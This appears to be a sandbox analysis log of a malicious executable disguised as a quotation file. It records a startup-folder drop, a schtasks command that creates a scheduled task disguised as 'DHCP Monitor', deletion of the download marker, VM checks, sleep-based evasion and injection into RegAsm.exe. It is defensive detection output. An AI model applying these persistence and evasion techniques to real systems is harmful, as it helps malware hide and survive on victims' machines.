Source: 2.2.Quotation ATB-PR28500KINH.exe.5b40000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 15.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	File created: C:\Users\user\AppData\Roaming\7redfg			Jump to dropped file
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\7redfg

Jump to dropped file

Boot Survival:

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp'

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File opened: C:\Users\user\AppData\Roaming\7redfg:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 2099	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2801	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 6820	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 872	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 399	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Window / User API: threadDelayed 1597	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 7040	Thread sleep time: -41980s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6220	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 5488	Thread sleep count: 399 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 4696	Thread sleep count: 1597 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe TID: 4696	Thread sleep time: -31940s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: RegAsm.exe, 00000001.00000002.507554003.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RegAsm.exe, 00000001.00000002.507554003.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe, 00000001.00000002.507554003.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000001.00000002.497722346.000000000150F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegAsm.exe, 00000001.00000002.507554003.0000000006F10000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081D7F mov eax, dword ptr fs:[00000030h]	0_2_05081D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081D7F mov eax, dword ptr fs:[00000030h]	0_2_05081D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050801CB mov eax, dword ptr fs:[00000030h]	0_2_050801CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_05081C2B mov eax, dword ptr fs:[00000030h]	0_2_05081C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050800AD mov ecx, dword ptr fs:[00000030h]	0_2_050800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050800AD mov eax, dword ptr fs:[00000030h]	0_2_050800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050900AD mov ecx, dword ptr fs:[00000030h]	0_2_050900AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050900AD mov eax, dword ptr fs:[00000030h]	0_2_050900AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 0_2_050901CB mov eax, dword ptr fs:[00000030h]	0_2_050901CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058601CB mov eax, dword ptr fs:[00000030h]	2_2_058601CB
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861D7F mov eax, dword ptr fs:[00000030h]	2_2_05861D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861D7F mov eax, dword ptr fs:[00000030h]	2_2_05861D7F
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058600AD mov ecx, dword ptr fs:[00000030h]	2_2_058600AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058600AD mov eax, dword ptr fs:[00000030h]	2_2_058600AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_05861C2B mov eax, dword ptr fs:[00000030h]	2_2_05861C2B
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058800AD mov ecx, dword ptr fs:[00000030h]	2_2_058800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058800AD mov eax, dword ptr fs:[00000030h]	2_2_058800AD
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Code function: 2_2_058801CB mov eax, dword ptr fs:[00000030h]	2_2_058801CB

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F12008			Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D96008			Jump to behavior

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpAC5D.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.498018854.0000000001220000.00000002.00000001.sdmp, RegAsm.exe, 00000001.00000002.498274600.0000000001940000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000002.00000002.498789127.0000000001B00000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
